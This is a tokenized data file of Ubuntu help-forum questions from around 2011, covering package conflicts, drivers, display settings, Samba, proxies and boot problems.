47291	unable to list windows shares from terminal	i am unable to list windows shares from terminal . i am getting the following error , root @ itsta2 : ~ # smbclient -l 172.xx.xx.xx -u john params.c : parameter ( ) - ignoring badly formed line in configuration file : # samba config file warning : the `` share modes '' option is deprecated unknown parameter encountered : `` read size '' ignoring unknown parameter `` read size '' enter john 's password : unknown socket option so_keeplive session setup failed : nt_status_logon_failure someone sort out the problem pls..
47297	use the gnome main menu without a panel ?	i really like docky for managing my applications but do n't want to crowd it too much with pointless apps . i would like to add an icon to open the gnome main menu ( applications , place , system etc ) to docky if possible ? if this is not possible is there anything that can achieve similar results ? i tried using dockbarx on the panel which works nicely but is n't the best looking . thanks
47299	keep an obsolete package	i 'm finally upgrading . i just reached the `` remove obsolete packages '' screen and , while glancing through , noticed a few packages that i installed and do not want removed . it lists about 150 so i 'd rather not keep 145 packages i do n't need . is there any way i can say `` keep these 2 packages but get rid of the rest '' ?
47300	file permissions in /var/www not changing	for some reason i ca n't change the file permissions of my var/www folder or anything else inside it . i 've tried using gksu-nautilus to change the permissions but it does n't work . when i open the properties window , and select a different level of permission for myself , it instantly switches back to the previous setting . any idea of how to fix this ?
47306	gtk theme and icons fail to load	i do n't know if it 's a recent update that 's done this or not , but in my last three logins , the gtk theme , icons and ubuntu fonts do n't load . instead , i 'm presented with an unskinned gtk default , with gnome icons and the default sans font . any ideas what could be causing this ?
47307	how can i prevent a package from being automatically removed in order to install another one ?	this is the example : i want to install elementary-desktop ( from ppa ) , but it requires to remove esound in order to install pulseaudio ( which i removed because it was causing problems with many apps ) . i already pinned both esound and pulseaudio and held them through sudo aptitude hold esound and sudo aptitude hold pulseaudio but , in synaptic , the prompt still states that esound must be removed . thanks in advance for your help !
47311	how do i disable my system from going to sleep ?	i am getting a web server setup at home on an older amd 2400+ desktop . i have ubuntu 11.04 installed and running however , after a time , i can no longer browse to the server . when i go to the keyboard and press a key , everything magically works again . i have looked through the bios and i am not seeing any power saving features enabled . is there anything like that in ubuntu ? can it be disabled ? i do n't have any gui installed . this is console only .
47314	where do minimized apps go in unity	when i minimize an app in ubuntu 11.04 using unity , where does it go ? i can alt+tab them but that is about it . where do i visually see them or at least a small icon that tells me where they are and how many windows of that type are opened ( like 4 windows of firefox i have ) .
47319	dual monitors on unity , one above the other - how can i drag a window from top monitor to lower monitor ( across central panel ) ?	i have two monitors attached to my ubuntu desktop system . one is mounted above the second one ( i.e . one up , one down ) . unity draws the system panel across the top of each monitor - so the bottom monitor 's panel is actually across the centre of my total display , with the other monitor above it . the problem is that i ca n't drag a window from the top monitor to the bottom - it goes most of the way across , but i ca n't slide the the title-bar down across the central panel . strangely , it works fine dragging from bottom to top monitor - the title-bar crosses the panel with no problems . i have a partial workaround by enabling put in compiz and setting mouse and keyboard shortcuts to switch windows to the other monitor , but it makes the system non-intuitive . the ideal solution would be to move the lower monitor 's panel to the bottom of the screen , but i do n't think unity works this way .
47320	english grammar checkers for gedit or libreoffice writer ?	please let me know if there are any efficient english grammar checkers available for gedit or libreoffice on ubuntu 11.04 .
47321	can i get the ubuntu software center in kde ?	is there a way to get the ubuntu software center on kubuntu ?
47322	how can i get miro to use the installed flash player ?	how can i get miro 4.0.1 to use the installed flash player to play youtube videos ? miro tells me to get flash 10 , but as far as i know i already have it .
47323	how to avoid warning message while using gedit ?	how to avoid the following warning message from gedit ( 2.30.4 ) on ubuntu 11.04 . ( gedit:25519 ) : critical ** : gedit_spell_checker_language_to_key : assertion `lang ! = null ' failed
47327	how do i get sdl audio working on 32 bit ?	i have been struggling with an sdl audio problem for a few weeks now . i have two installations : 1 . ubuntu 10.04 ( 64 bit ) 2 . ubuntu 11.04 ( 32 bit ) both are more or less clean installations running on oracle vm virtualbox . on the 64 bit version my own application using sdl is running without any problem , on the 32 bit installation however it keeps stopping when i try to start sdl sound , it complains that it ca n't open any audio device . i tried searching on the above and have noticed different issues with games using sdl sound , so far i have not found any answer that solves my issues . both installations have libsdl1.2debian and libsdl1.2debian-pulseaudio installed . also i have had the same issues in 'real ' ubuntu installations , but moved to virtualbox to simplify testing and have a clean installation for both . any help is very much appreciated . cheers , marcel .
47328	text inside files has squares with numbers in it	some text files i come across , have little squares with numbers in them ( in place of certain characters ) . i am unable to copy and paste these in ubuntu , but may search and replace in gedit each character individually ( replacing for what i think is it 's best match ) , obviously this is only feasible if there are only a few types of square . i 'm lead to believe that these squares are displayed because i am missing certain fonts ... my aim is to convert this into an epub or pdf file . my question is : what type of coding is this ? and why does this happen ? if it is missing fonts , can i install them and will this solve the problem ( allow me to convert symbols to pdf e.g . using calibre ) ? is there an application to convert my text file to a text file without these squares , instead replacing them with a similar character ? for example , the symbol is pretty much a y , so i would like this function to replace each instance of with a y . an example txt file is here and it originally looked like this ( note inaccuracies followed ocr ) . note : i could n't get either uni2ascii or iconv to work ( though i may not have been using the correct [ options ] ) , so please check with the given file before posting a solution !
47329	discs in dvd drive not being read	does anyone have an experience with ubuntu that is no longer reading discs in the dvd drive ? this is my first time ubuntu does not see the disc : | the disc is fine and works on my other ubuntu computers . the drive is there and powered . i can even type in eject in a terminal and the drive will open . using the command : sudo lshw -c disk i am able to see info about my drive too . actually both of my internal dvd drives can not read discs anymore . if the output is not readable below , here is the info in pastebin . http : //pastebin.com/gqqsctpw *-cdrom:0 description : dvd writer product : dvd_rw nd-3500ag vendor : _nec physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom1 logical name : /dev/cdrw1 logical name : /dev/dvd1 logical name : /dev/dvdrw1 logical name : /dev/scd0 logical name : /dev/sr0 version : 2.1b serial : [ _nec dvd_rw nd-3500ag2.1b06022300bt-liggy capabilities : removable audio cd-r cd-rw dvd dvd-r configuration : ansiversion=5 status=nodisc *-cdrom:1 description : dvd-ram writer product : cddvdw sh-s222a vendor : tsstcorp physical id : 0.1.0 bus info : scsi @ 0:0.1.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd1 logical name : /dev/sr1 version : sb01 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc
47331	lamp-server wants to install mysql but i want it to use already installed mariadb	i want to install lamp-server in ubuntu 10.10 ( the end goal is to install redmine ) , i am using sudo tasksel install lamp-server however after downloading packages it asks for a root password for mysql , now , in my machine i have already an instance of mariadb 5.24 and i want it to use that ( not download or install real mysql ) , what do i need to do in order to properly configure it with the right database ? thanks
47332	how can i disable all requests for passwords ?	i want to disable all password requests on natty narwal . my laptop is only on when im using it , and it never leaves my house . i dont want to have to log in when i turn the computer on , resume the computer , install a program , uninstall a program , anything . at all . please help me get as close to this as i can
47347	illustrator alternative	i have just migrated to ubuntu a few months ago , and find myself wanting illustrator again . what is the best alternative for vector based drawing ? can gimp do vector as well , or is it mainly pixel based like photoshop ?
47348	fixing recursive fault but reboot is needed	beginner here , i am trying to install ubuntu 11.04 on my laptop , 64bit . whenever i attempt to boot ubuntu , it goes through a bunch of random lines of code and ends with `` fixing recursive fault but reboot is needed ! '' i tried other places for help but did n't really understand anything . can anyone help ?
47350	error updating cardapio	during my last run of the update manager , i got an error about a broken package . i went into synaptic and found that it was the cardapio menu replacement . i completely removed all packages relating to it , then tried to reinstall . i got this error : e : /var/cache/apt/archives/cardapio-gnomepanel_0.9.179-ubuntu1-maverick1_i386.deb : trying to overwrite '/usr/bin/cardapio-gnome-panel-applet ' , which is also in package cardapio 0.9.180-ubuntu1-maverick1 i searched au and found a similar issue . the solution to that problem was found here . i tried following those instructions , first using the force-overwrite flag , and when that did n't work , the force-all flag . force-all seemed to work , but when i tried running update , i 'm still getting errors . here 's the entire terminal session ; can anyone help me out ? esther @ esther-linux : ~ $ sudo dpkg -i -- force-all /var/cache/apt/archives/cardapio-gnomepanel_0.9.179-ubuntu1-maverick1_i386.deb ( reading database ... 184583 files and directories currently installed . ) preparing to replace cardapio-gnomepanel 0.9.179-ubuntu1-maverick1 ( using ... /cardapio-gnomepanel_0.9.179-ubuntu1-maverick1_i386.deb ) ... unpacking replacement cardapio-gnomepanel ... dpkg : cardapio-gnomepanel : dependency problems , but configuring anyway as you requested : cardapio-gnomepanel depends on cardapio ; however : package cardapio is not installed . setting up cardapio-gnomepanel ( 0.9.179-ubuntu1-maverick1 ) ... esther @ esther-linux : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : cardapio the following new packages will be installed : cardapio 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0b/460kb of archives . after this operation , 2,474kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 184583 files and directories currently installed . ) unpacking cardapio ( from ... /cardapio_0.9.180-ubuntu1-maverick1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/cardapio_0.9.180-ubuntu1-maverick1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/cardapio-gnome-panel-applet ' , which is also in package cardapio-gnomepanel 0.9.179-ubuntu1-maverick1 errors were encountered while processing : /var/cache/apt/archives/cardapio_0.9.180-ubuntu1-maverick1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
47356	how do i enable my innodb	i need to enable innodb on my ubuntu server 10.04 and having tons of problems , i have tried posting questions everywhere and i have no answers ... .i tried this show variables like `` % innodb % '' ; + -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -+ | variable_name | value | + -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -+ | have_innodb | no | | ignore_builtin_innodb | off | + -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -+ so it seems like it is not installed or something but i keep reading its installed by default show engines ; + -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- + | engine | support | comment | transactions | xa | savepoints | + -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- + | myisam | default | default engine as of mysql 3.23 with great performance | no | no | no | | mrg_myisam | yes | collection of identical myisam tables | no | no | no | | blackhole | yes | /dev/null storage engine ( anything you write to it disappears ) | no | no | no | | csv | yes | csv storage engine | no | no | no | | memory | yes | hash based , stored in memory , useful for temporary tables | no | no | no | | federated | no | federated mysql storage engine | null | null | null | | archive | yes | archive storage engine | no | no | no | + -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- + 7 rows in set ( 0.00 sec ) i dont see it in the output and when trying to install social engine i get this :
47358	is tweetdeck for desktop open source ?	is tweetdeck for desktop open source ? if not are there any open source alternatives to gwibber ?
47361	desktop player for music stored on ubuntu one ?	is there a linux desktop application available to playback music files stored on ubuntu one ?
47362	how to create a windows installation usb in ubuntu ?	i have the need to create a live usb to install windows but from ubuntu , i 've tried to emulate the tools that make the same function from windows but i just do not work . i would be very helpful to know how . thanks
47364	laptop brightness problem on toshiba portege r705-p35	basic specs : toshiba portege r705-p35 13.1 '' screen intel hd graphics 4 gb ram , core i3 2.4 ghz dual boot ubuntu 11.04 and windows 7 ( using grub bootloader ) basically , ubuntu recognizes me pressing the key combinations ( fn+f6 and fn+f7 ) for changing my screen brightness and shows the notification bubble where the level changes . however this change is n't actually reflected on the screen . the brightness remains unchanged from what i left it at when i was logged into windows . this problem has only manifested itself after i update to natty , the brightness adjustment worked perfectly in 10.10 for me . it seems i have the same issue as in this : changing brightness on a sony vaio laptop question , however on a toshiba portege r705-p35 . even if i knew exactly what to do based on the top answer ( yeah , no clue what to do inside the keymap rules ) , it does n't seem to be the right thing to do since ubuntu does recognize my keystrokes anyway . relevant , but does n't solve the issue only presents a workaround : ca n't adjust brightness on my laptop
47371	are u1 public urls static ?	if i publish several u1 files , delete some , add some , update their file content - will the public urls of every file stay the same in the end , or do they change depending on the order files are published in and etc ?
47372	using the apple wireless keyboard	i borrowed my flatmate 's apple wireless keyboard and i want to connect it to my dell running ubuntu 11.04 ( unity ui ) . i tried various solutions , but i ca n't even get it to work like a numpad . could somebody please write down or at least point to the steps needed to make it run properly ?
47373	`` more apps '' icon disappered on launcher . how can it be restored ?	i know how to add icons for applications to the launcher ; but the icon lost is for `` more apps '' . i do n't know what is the application responsible for `` more apps '' . could someone provide help ?
47374	what does it mean to down load the ..common.. driver ?	from this paragraph : printer language : ufrii-lt driver link is the mfg website download . two drivers to install . install the ..common.. driver first . multi-function device : printer / scanner / fax . scanner work 100 % with the pixma back end . see link to a howto . fax not tested yet . what do they mean by ..common.. driver ?
47378	nvidia-current drivers enabled , not in use ? ? help	lshw -c video *-display description : vga compatible controller product : g96 [ geforce 9600m gs ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : fc000000-fcffffff memory : d0000000-dfffffff memory : fa000000-fbffffff ioport : cc00 ( size=128 ) memory : fd000000-fd07ffff lspci -k 01:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9600m gs ] ( rev a1 ) subsystem : asustek computer inc. device 1892 kernel driver in use : nvidia kernel modules : nvidia-current , nouveau , nvidiafb jockey-text -l xorg : nvidia_173 - nvidia accelerated graphics driver ( proprietary , disabled , not in use ) xorg : nvidia_current - nvidia accelerated graphics driver ( proprietary , enabled , not in use ) cat /etc/x11/xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ roseapple ) fri feb 25 14:43:24 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` seiko/epson '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` viewsonic va2323wm '' horizsync 24.0 - 82.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9600m gs '' busid `` pci:1:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9600m gs '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection any other information needed will be gladly added as requested .
47379	how to use a proxy on the command line ?	i can set my proxy username and password along with proxy settings in the proxy ui but these settings do not work on the command line . how can i use apps such as wget & ping on the command line with a proxy ? example details : username : 1234 pass : linux proxy : proxy port : 8080
47380	how can i see the temperature of a video card ?	i have one laptop that presents/displays problems to me by heating , i need to know like seeing the temperature of my laptop and preventing an overheat . thanks .
47381	programs to download subtitles for videos	i have many movies without subtitles , is there a program to find the right subtitles for them ?
47383	what about internet problem in ubuntu 11.04 ?	i have a problem in ubuntu 11.04 that internet can not work when i run my pc , i have dsl in my computer and when internet can not run i pull cable and put it again these problem every time when i run pc , and many users complain from this problem . what is the solution ?
47385	where i can download video codecs ?	i 'm new to ubuntu and i 'm having difficulty watching videos . how can i install the video codecs needed for most video formats ?
47393	gvim gives warning : 'unable to register window with path '	when i open gvim to edit a file , after about 10 or 15 seconds , the terminal window from which i typed gvim foo.txt gives the error : ** ( gvim:2581 ) : warning ** : unable to register window with path '/com/canonical /foo/3c00024 ' : timeout was reached this does n't prevent me from continuing to edit with vim , but makes me think something is n't configured correctly . what does this mean ? i 'm running ubuntu 11.04 , and i 've installed vim with apt-get install vim vim-gnome vim-nox etc . ( not sure exactly which packages . )
47395	how to start with arm development in ubuntu ?	i 've once programming with keil c51 , and later i found sdcc/ucsim is more elegant for me ( though keil c51 do optimization better ) , so i do n't need keil c51 anymore , and now i 'm heavy relied on ucsim to do unit tests . now i 'm start to develop with arm , however , sdcc does n't support arm . i 've tried uvision which is very popular among my friends , but i want ubuntu alternative . i can work smoothly with makefile , so i do n't need the ide . uvision has a lot of predefined chipsets , i 'm afraid they wo n't be included in gcc . my question is : is there any arm compiler for ubuntu , with a rich chipset support ? and , is there any light-weight arm vm like ucsim , so i can do unit test in arm development ?
47397	how do i add the kernel ppa ?	i can get ubuntu mainline kernels from this kernel ppa - is there a way to add it to my repository list the same as regular launchpad ppas ?
47400	how to use wget with get parameter , or redirect web ?	sorry , .. i 'm noob in ubuntu ... and i 'm trying to make a robots for downloading file.. i can download the zip file via web browser 's address bar like this http : //www.mysite.com/getfile.php ? mirror=1 & categori=advanture & file=001.zip but , when i try to use wget , the file never been downloaded ... this is how i use wget : $ wget -h http : //www.mysite.com/getfile.php ? mirror=1 & categori=images & file=001.zip $ wget -h -k http : //www.mysite.com/getfile.php ? mirror=1 & categori=images & file=001.zip $ wget -h -m http : //www.mysite.com/getfile.php ? mirror=1 & categori=images & file=001.zip $ wget -h -m -k http : //www.mysite.com/getfile.php ? mirror=1 & categori=images & file=001.zip all wget just download the php file.. when i open it , it 's just < font color=red > invalid url < /font > does it because of redirect ? or cookie ? when i clear all cookie in mozilla , and download again.. it still wokrs.. or session ? mysite.com is never use login user to download
47404	how do i make post-install scripts ?	how do i make post-install scripts so when i reinstall ubuntu everything is as i want it ? things i want to achive : installing ppa installing my programs themes needs to be installed settings needs to be changed ( power management , short commands , startup applications , etc . ) system reboots
47409	shrink a partition without losing data	i 've got a linux-based os installed on a partition i want to shrink . want to avoid reinstallation or losing/corrupting data , if possible .
47419	how to make the android notifer desktop indicator appear on the unity panel ?	i was using the android-notifier-desktop indicator on my lucid 32bit installation comfortably , but when i changed to natty amd64 , the same setup does not seem to work . summary of things : android-notifier-desktop_0.5.1-0-amd64.deb is installed . i can see a java android-notifier-desktop.jar running in my ps list . there is no unity-panel indicator for the notifier ( this is the problem ) . i had also added the gnome-panel at the bottom of my desktop ; trying to `` add to panel ... '' here also does not show the notifier as an option . has anyone setup this notifier on natty amd64 ? am i missing something here ? are there any other ways to get the notifier showing ?
47421	how do i run xplorer360 ?	i am trying to run xplorer360 in ubuntu . i have tried both wine and virtualbox ( win7 ) but the program always tells me that the program can not find my hard drive . it works fine under windows , but i no longer have windows installed . how can i get this running .
47425	kubuntu bootloader overwritten by windows bootloader . cant choose to run kubuntu anymore !	my laptop had kubuntu installed earlier but then i made a new installation of windows 7 ultimate . now i can not choose to run kubuntu anymore as its bootloader was overwritten . how can i configure my system for dual boot ? [ i am new to linux/ kubuntu ]
47426	how to change ubuntu logo ( start-here ) ?	in ubuntu 11.04 ( natty ) , i can not find the way to change ubuntu logo ( start-here ) on gnome panel . i can not do right-click on panel to change something , for example moving some indicator , changing background of gnome panel . anyone know how to , please share it . thanks in advance !
47428	how do i completely remove overlay scrollbars in 11.04 ?	i 'm using the `` classic '' gnome desktop with 11.04 , and my scrollbars are a fancy tiny line that you must hover over to get a popup control that allows you to scroll . this is just mildly annoying in gnome apps ( e.g . the file browser ) , but completely unusable in java apps such as eclipse , in which the popup never appears . i 've been told that this widget is called an `` overlay scrollbar '' . how do i get rid of it for all applications ?
47430	broadcom problems . no driver in additional drivers	i had problem with broadcom drivers . the insternet was super-slow , 1kb/s was the max download speed . then i was searching for a solution , and found a tip that offered to install bmcwl-kernel-source . i isnstalled it , restarted my computer , and there were no wifi drivers . ( there were only wired connection option ) . i tried to use `` additional drivers '' but it wo n't show b43 anymore . help ? : ) ubuntu : 11.04 kernel : 2.6.38-8 generic thanks : )
47431	filter function in file managers ?	i 'm a gnome user ( i used to be a kde3 user but i 'd rather prefer gnome2 to kde4 ) . the only thing i miss of it is dolphin filter function ... it 's possible to implement or have it in a gnome file browser ?
47441	docky and pidgin helper	my pidgin helper did n't work ( unread message counter did n't appear ) . i 'm running : docky version : 2.2.0 bzr docky r1808 ppa pidgin 2.7.11 ( libpurple 2.7.11 ) ubuntu 10.04 here is a stack trace [ error 13:43:01.562 ] [ helper ] pidgin_control.py : : traceback ( most recent call last ) : [ error 13:43:01.562 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 576 , in msg_reply_handler [ error 13:43:01.562 ] [ helper ] pidgin_control.py : : reply_handler ( *message.get_args_list ( **get_args_opts ) ) [ error 13:43:01.562 ] [ helper ] pidgin_control.py : : file `` /usr/share/dockmanager/scripts/pidgin_control.py '' , line 90 , in list_names_handler [ error 13:43:01.562 ] [ helper ] pidgin_control.py : : self.update_badge ( ) [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : file `` /usr/share/dockmanager/scripts/pidgin_control.py '' , line 141 , in update_badge [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : count = count + self.pidgin.iface.purpleconversationgetdata ( conv , `` unseen-count '' ) [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/proxies.py '' , line 140 , in __call__ [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : **keywords ) [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 620 , in call_blocking [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : message , timeout ) [ error 13:43:01.563 ] [ helper ] pidgin_control.py : : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.unknownmethod : method `` purpleconversationgetdata '' with signature `` is '' on interface `` im.pidgin.purple.purpleinterface '' does n't exist [ error 13:43:06.787 ] [ helper ] pidgin_control.py : : error : dbus.connection : exception in handler for d-bus signal : [ error 13:43:06.787 ] [ helper ] pidgin_control.py : : traceback ( most recent call last ) : [ error 13:43:06.787 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 214 , in maybe_handle_message [ error 13:43:06.787 ] [ helper ] pidgin_control.py : : self._handler ( *args , **kwargs ) [ error 13:43:06.787 ] [ helper ] pidgin_control.py : : file `` /usr/share/dockmanager/scripts/pidgin_control.py '' , line 112 , in conversation_updated [ error 13:43:06.787 ] [ helper ] pidgin_control.py : : self.update_badge ( ) [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : file `` /usr/share/dockmanager/scripts/pidgin_control.py '' , line 141 , in update_badge [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : count = count + self.pidgin.iface.purpleconversationgetdata ( conv , `` unseen-count '' ) [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/proxies.py '' , line 140 , in __call__ [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : **keywords ) [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 620 , in call_blocking [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : message , timeout ) [ error 13:43:06.788 ] [ helper ] pidgin_control.py : : dbusexception : org.freedesktop.dbus.error.unknownmethod : method `` purpleconversationgetdata '' with signature `` is '' on interface `` im.pidgin.purple.purpleinterface '' does n't exist [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : error : dbus.connection : exception in handler for d-bus signal : [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : traceback ( most recent call last ) : [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 214 , in maybe_handle_message [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : self._handler ( *args , **kwargs ) [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : file `` /usr/share/dockmanager/scripts/pidgin_control.py '' , line 112 , in conversation_updated [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : self.update_badge ( ) [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : file `` /usr/share/dockmanager/scripts/pidgin_control.py '' , line 141 , in update_badge [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : count = count + self.pidgin.iface.purpleconversationgetdata ( conv , `` unseen-count '' ) [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/proxies.py '' , line 140 , in __call__ [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : **keywords ) [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : file `` /usr/lib/pymodules/python2.6/dbus/connection.py '' , line 620 , in call_blocking [ error 13:43:06.809 ] [ helper ] pidgin_control.py : : message , timeout ) [ error 13:43:06.810 ] [ helper ] pidgin_control.py : : dbusexception : org.freedesktop.dbus.error.unknownmethod : method `` purpleconversationgetdata '' with signature `` is '' on interface `` im.pidgin.purple.purpleinterface '' does n't exist is there some workaround ?
47443	hard lock-up and skype window shows up after reboot	i just had a hard lock-up not even a alt+shift+prtsc+r+s+e+i+u+b could solve , and when rebooting , the skype window was asking me for the userid and password , which is weird , because i had entered them before . i am wondering if skype was trying to update something that caused the lock-up , and that 's why i have to enter the userid/pwd again on reboot . has anyone else seen this ?
47444	how to report bug after hard crash ?	i just had a hard lock-up crash not even a alt + shift + sysrq + r + s + e + i + u + b could solve . i 've now rebooted and would like to report the bug with the saved logs . what 's the best way to report it ?
47445	massive xubuntu desktop malfunction	i 'm using xubuntu 11.04 . before everything worked fine , but when booting today the following happened : window focus does not leave the first-opened program . this means that if i keep firefox open , and open a terminal , window focus will never be transferred to the terminal . ( edit : if i open a terminal first , and then open firefox , firefox steals focus ) window menus have disappeared . the maximize , minimize , etc. , buttons and menu are gone . in xfce settings manager , the `` window manager '' settings window is empty . there is just a gray screen there , so i can not modify any window settings . the keyboard shortcuts i had previously defined using the settings manager do no longer work . further , alt-tab no longer works for cycling between windows . the mouse pointer does not show when i first log in . i have to log out and log in again ( with an invisible pointer ) before the mouse shows itself . edit : i can not re-size or move the thunderbird window , but i can move the firefox window what can i do to troubleshoot this ?
47447	block devices sda , sdb , sdc . what comes after sdz ?	my block devices are named sda , sdb and so on . what happens when i get to sdz ? is the next one going to be called sdaa ?
47459	usb stick not avaliable after rebooting from live session	ive noticed a really annoying behaviour in ubuntu : whenever i restart or shutdown the pc from a live session , the usb stick becomes unavaliable when it reboots/turns on ( as if the `` safe removal '' feature from windows was used ) ive noticed this in 10.04 , 10.10 , 11.04 , and even linux mint 10 and 11 . also happens with all usb sticks ive tried ( like 4 different models ) , in all machines ( tested in like 5 ) . so i think this is rather a feature than a bug/hardware issue . but its really annoying . after playing in a live session , i must physically unplug-and-replug the usb stick so it works again . is there any way to disable this behaviour ? so i can reboot my pc and use the live session again without unplugging and replugging the usb stick ?
47461	ubuntu on 256mb ram	i was wondering if i can use ubuntu ( scale down version ? ) or a close derivative like xubuntu or kubuntu on an old machine ? its a p4 with 256mb ram . what distro would you suggest ? forgot to mention that its only used for basic document and internet work .
47466	trying to install phatch getting dependency issues regarding blender , try to install blender more dependency issues	so i am trying to install the latest version of phatch using the .deb for ubuntu available on their site and installing through the ubuntu software center . i get the message `` can not install blender '' . so i try to install blender ( still in usc ) and i get the following : the following packages have unmet dependencies : blender : depends : libavcodec-extra-52 ( > = 4:0.6-1~ ) but 4:0.6.2-1ubuntu2 is to be installed depends : libavdevice-extra-52 ( > = 4:0.6-1~ ) but 4:0.6.1-2ubuntu1 is to be installed depends : libavformat-extra-52 ( > = 4:0.6-1~ ) but 4:0.6.1-2ubuntu1 is to be installed depends : libavutil-extra-50 ( > = 4:0.6-1~ ) but 4:0.6.2-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.5.2-8ubuntu4 is to be installed depends : libjpeg62 ( > = 6b1 ) but 6b1-1ubuntu1 is to be installed depends : libstdc++6 ( > = 4.5 ) but 4.5.2-8ubuntu4 is to be installed depends : libswscale-extra-0 ( > = 4:0.6-1~ ) but 4:0.6.1-2ubuntu1 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu3 is to be installed when i try to install any of the missing packages in synaptic it fails : for example libavdevice-extra-52 : depends : libavcodec-extra-52 ( < 4:0.6.1-99 ) but 4:0.6.2-1ubuntu2 is to be installed depends : libavformat-extra-52 but it is not going to be installed depends : libavformat-extra-52 but it is not going to be installed depends : libavutil-extra-50 ( < 4:0.6.1-99 ) but 4:0.6.2-1ubuntu2 is to be installed it also wants to uninstall a lot of programs including audacity , vlc etc . so is it actually possible to install blender and therfor phatch on ubuntu 11.04 and if so how ?
